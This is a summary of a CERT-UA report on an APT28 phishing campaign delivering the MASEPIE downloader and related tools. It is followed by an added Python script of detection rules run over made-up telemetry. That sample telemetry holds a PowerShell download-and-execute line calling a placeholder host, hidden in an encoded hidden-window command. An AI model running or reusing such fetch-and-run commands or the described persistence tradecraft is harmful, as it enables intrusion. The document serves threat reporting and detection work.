December 28, 2023 at 12:46PM
Ukraine's CERT (CERT-UA) warns of a new phishing campaign by APT28, a Russian state-sponsored group known for targeting government and Western entities. The attacks, observed between December 15 and 25, 2023, deliver a previously unseen Python downloader, 'MASEPIE,' via phishing emails. APT28 then brings in further tooling for data theft and network reconnaissance, reaching that stage within about an hour of initial access.
Key takeaways from the report:
– Ukraine's Computer Emergency Response Team (CERT-UA) has warned about a new phishing campaign that allowed Russia-linked hackers to deploy previously unseen malware on a network within one hour of the initial compromise.
– APT28, also known as Fancy Bear or Strontium, is a Russian state-sponsored threat actor targeting government entities, businesses, universities, research institutes, and think tanks in Western countries and NATO organizations. They use phishing campaigns and exploit zero-day vulnerabilities in widely used software.
– The latest campaign targeting Ukraine used phishing emails urging recipients to click a link supposedly leading to an important document. The link redirected to malicious web resources that used JavaScript to drop a Windows shortcut (LNK) file; opening the shortcut ran PowerShell commands that fetched and launched a new Python-based downloader called 'MASEPIE.'
– MASEPIE establishes persistence on infected devices by modifying the Windows Registry and adding a deceptively named LNK file to the Windows Startup folder. It primarily functions to download additional malware and steal data.
– APT28 also uses a set of PowerShell scripts named ‘STEELHOOK’ to steal data from Chrome-based web browsers, as well as the ‘OCEANMAP’ backdoor for executing base64-encoded commands via cmd.exe.
– OCEANMAP establishes persistence on the system by creating a .URL file in the Windows Startup folder and uses the Internet Message Access Protocol (IMAP) as a control channel to receive commands discreetly.
– Other tools deployed for network reconnaissance and lateral movement include IMPACKET, a collection of Python classes for working with network protocols, and its SMBEXEC script, which provides remote command execution over SMB.
– These tools are deployed in compromised systems within an hour from the initial compromise, indicating a rapid and well-coordinated attack.
These takeaways give a clear picture of the nature and tactics of the campaign against Ukraine as described in the report.
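As an added example (not code from the report, from CERT-UA, or from any of the tools named above), the following Python script turns the tradecraft summarised in the takeaways into hunting rules and runs them over constructed telemetry: the LNK-to-PowerShell stage, a Python downloader running from a user-writable directory, Startup-folder .lnk/.url and Registry Run persistence, cmd.exe spawned by an implant, and IMAP connections from a process that is not a mail client. The event shape, process and file names, paths, ports and the mail-client allow-list are assumptions for illustration, not indicators from the advisory; it also goes beyond the text in assuming the LNK stage used a base64-encoded PowerShell command and that the backdoor executable lives in a user-writable directory.

```python
# Added example (not the report's or any tool's code): hunting rules for the
# tradecraft summarised above, applied to constructed telemetry. Process names,
# paths, ports and the mail-client allow-list are assumptions for illustration.
import base64
import re
from dataclasses import dataclass

STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.(lnk|url)$", re.I)
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)
USER_DIRS_RE = re.compile(r"\\(appdata|temp|downloads|users\\public)\\", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
IMAP_PORTS = {143, 993}                             # IMAP / IMAPS
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}   # assumed allow-list


@dataclass
class Event:
    kind: str            # "process", "file", "registry" or "network"
    image: str = ""      # executable name of the acting process
    parent: str = ""     # full path of the parent image (process events)
    cmdline: str = ""    # command line (process events)
    target: str = ""     # file path or registry value written
    dest_port: int = 0   # destination port (network events)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ps_encode(script):
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_b64_blobs(cmdline):
    """Return printable ASCII text hidden in base64 blobs of a command line.
    UTF-16LE is tried first (PowerShell -EncodedCommand), then UTF-8."""
    found = []
    for blob in B64_RE.findall(cmdline):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:            # binascii.Error is a ValueError subclass
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if text.isascii() and text.isprintable() and len(text) > 3:
                found.append(text)
                break
    return found


def hunt(events):
    """Apply the rules; returns (rule_name, event_index) pairs in event order."""
    hits = []
    for i, e in enumerate(events):
        img = e.image.lower()
        if e.kind == "process":
            # Shortcut opened from Explorer launching PowerShell with an encoded command
            if (img == "powershell.exe" and basename(e.parent) == "explorer.exe"
                    and decode_b64_blobs(e.cmdline)):
                hits.append(("lnk_powershell_encoded", i))
            # Python interpreter running a script from a user-writable directory (MASEPIE-style)
            if img in ("python.exe", "pythonw.exe") and USER_DIRS_RE.search(e.cmdline):
                hits.append(("python_from_user_dir", i))
            # cmd.exe spawned by a parent living in a user-writable directory (OCEANMAP-style)
            if img == "cmd.exe" and USER_DIRS_RE.search(e.parent):
                hits.append(("cmd_from_user_dir_parent", i))
        elif e.kind == "file" and STARTUP_RE.search(e.target):
            hits.append(("startup_folder_shortcut", i))     # .lnk / .url persistence
        elif e.kind == "registry" and RUN_KEY_RE.search(e.target):
            hits.append(("run_key_persistence", i))
        elif e.kind == "network" and e.dest_port in IMAP_PORTS and img not in MAIL_CLIENTS:
            hits.append(("imap_from_non_mail_client", i))   # IMAP used as a C2 channel
    return hits


# Constructed sample telemetry, not real indicators.
PS_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
SAMPLE_EVENTS = [
    Event("process", image="powershell.exe", parent=r"C:\Windows\explorer.exe",
          cmdline=f"powershell.exe -w hidden -enc {ps_encode(PS_SCRIPT)}"),
    Event("process", image="python.exe",
          parent=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          cmdline=r"C:\Users\u\AppData\Local\Temp\py\python.exe C:\Users\u\AppData\Local\Temp\downloader.py"),
    Event("file", image="python.exe",
          target=r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk"),
    Event("registry", image="python.exe",
          target=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update"),
    Event("process", image="cmd.exe", parent=r"C:\Users\u\AppData\Roaming\backdoor.exe",
          cmdline="cmd.exe /c whoami"),
    Event("network", image="backdoor.exe", dest_port=993),
    Event("process", image="powershell.exe", parent=r"C:\Windows\explorer.exe",
          cmdline="powershell.exe -NoProfile"),              # benign control
    Event("network", image="outlook.exe", dest_port=993),    # benign mail client
]

if __name__ == "__main__":
    for rule, idx in hunt(SAMPLE_EVENTS):
        print(f"{rule:28s} event[{idx}] {SAMPLE_EVENTS[idx].image}")
```

Run as-is it prints one line per rule hit on the six malicious events and nothing for the two benign controls. The rules are deliberately coarse: a Startup-folder shortcut or a Run key write is common in legitimate software, so in a real deployment these would be scored together per host and time window rather than alerted on individually, which is what the one-hour timeline in the report makes possible.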